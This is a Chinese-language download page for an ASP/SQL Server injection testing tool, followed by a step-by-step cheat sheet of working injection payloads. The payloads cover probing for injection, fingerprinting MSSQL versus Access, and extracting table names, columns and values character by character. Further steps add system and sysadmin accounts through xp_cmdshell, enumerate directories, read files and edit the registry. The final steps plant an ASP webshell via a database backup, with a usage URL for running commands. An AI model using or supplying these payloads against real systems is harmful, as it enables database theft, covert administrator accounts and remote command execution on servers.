本工具功能非常強(qiáng)大,希望同學(xué)們用于正途,別去做一些偷雞摸狗的令人可恥的事情,由VB語言編寫的網(wǎng)站漏洞檢測工具的名稱,ASP注入漏洞檢測工具,特別在SQL Server注入檢測方面有極高的準(zhǔn)確率。
1.判斷是否有注入
;and 1=1
;and 1=2
2.初步判斷是否是mssql
;and user>0
3.判斷數(shù)據(jù)庫系統(tǒng)
;and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0 access
4.注入?yún)?shù)是字符
'and [查詢條件] and ''='
5.搜索時沒過濾參數(shù)的
'and [查詢條件] and '%25'='
6.猜數(shù)據(jù)庫
;and (Select Count(*) from [數(shù)據(jù)庫名])>0
7.猜字段
;and (Select Count(字段名) from 數(shù)據(jù)庫名)>0
8.猜字段中記錄長度
;and (select top 1 len(字段名) from 數(shù)據(jù)庫名)>0
9.(1)猜字段的ascii值(access)
;and (select top 1 asc(mid(字段名,1,1)) from 數(shù)據(jù)庫名)>0
(2)猜字段的ascii值(mssql)
;and (select top 1 unicode(substring(字段名,1,1)) from 數(shù)據(jù)庫名)>0
10.測試權(quán)限結(jié)構(gòu)(mssql)
;and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));--
;and 1=(SELECT IS_SRVROLEMEMBER('serveradmin'));--
;and 1=(SELECT IS_SRVROLEMEMBER('setupadmin'));--
;and 1=(SELECT IS_SRVROLEMEMBER('securityadmin'));--
;and 1=(SELECT IS_SRVROLEMEMBER('diskadmin'));--
;and 1=(SELECT IS_SRVROLEMEMBER('bulkadmin'));--
;and 1=(SELECT IS_MEMBER('db_owner'));--
11.添加mssql和系統(tǒng)的帳戶
;exec master.dbo.sp_addlogin username;--
;exec master.dbo.sp_password null,
username,password;--
;exec master.dbo.sp_addsrvrolemember sysadmin
username;--
;exec master.dbo.xp_cmdshell 'net user username
password /workstations:* /times:all
/passwordchg:yes /passwordreq:yes /active:yes /add'
;--
;exec master.dbo.xp_cmdshell 'net user username
password /add';--
;exec master.dbo.xp_cmdshell 'net localgroup
administrators username /add';--
12.(1)遍歷目錄
;create table dirs(paths varchar(100), id int)
;insert dirs exec master.dbo.xp_dirtree 'c:\'
;and (select top 1 paths from dirs)>0
;and (select top 1 paths from dirs where paths not
in('上步得到的paths'))>)
(2)遍歷目錄
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_availablemedia;-- 獲得當(dāng)前所有驅(qū)動器
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 獲得子目錄列表
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 獲得所有子目錄的目錄樹結(jié)構(gòu)
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的內(nèi)容
13.mssql中的存儲過程
xp_regenumvalues 注冊表根鍵, 子鍵
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE',
'SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多個記錄集方式返回所有鍵值
xp_regread 根鍵,子鍵,鍵值名
;exec xp_regread 'HKEY_LOCAL_MACHINE',
'SOFTWARE\Microsoft\Windows\CurrentVersion',
'CommonFilesDir' 返回制定鍵的值
xp_regwrite 根鍵,子鍵, 值名, 值類型, 值
值類型有2種REG_SZ 表示字符型,REG_DWORD 表示整型
;exec xp_regwrite 'HKEY_LOCAL_MACHINE',
'SOFTWARE\Microsoft\Windows\CurrentVersion',
'TestValueName','reg_sz','hello' 寫入注冊表
xp_regdeletevalue 根鍵,子鍵,值名
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE',
'SOFTWARE\Microsoft\Windows\CurrentVersion',
'TestValueName' 刪除某個值
xp_regdeletekey 'HKEY_LOCAL_MACHINE',
'SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 刪除鍵,包括該鍵下所有值
14.mssql的backup創(chuàng)建webshell
use model
create table cmd(str image);
insert into cmd(str) values ('<% Dim oScript %>');
backup database model to disk='c:\l.asp';
15.mssql內(nèi)置函數(shù)
;and (select @@version)>0 獲得Windows的版本號
;and user_name()='dbo' 判斷當(dāng)前系統(tǒng)的連接用戶是不是sa
;and (select user_name())>0 爆當(dāng)前系統(tǒng)的連接用戶
;and (select db_name())>0 得到當(dāng)前連接的數(shù)據(jù)庫
16.簡潔的webshell
use model
create table cmd(str image);
insert into cmd(str) values ('<%=server.createobject("wscript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%>');
backup database model to disk='g:\wwwtest\l.asp';
請求的時候,像這樣子用:
http://ip/l.asp?c=dir
- PC官方版
- 安卓官方手機(jī)版
- IOS官方手機(jī)版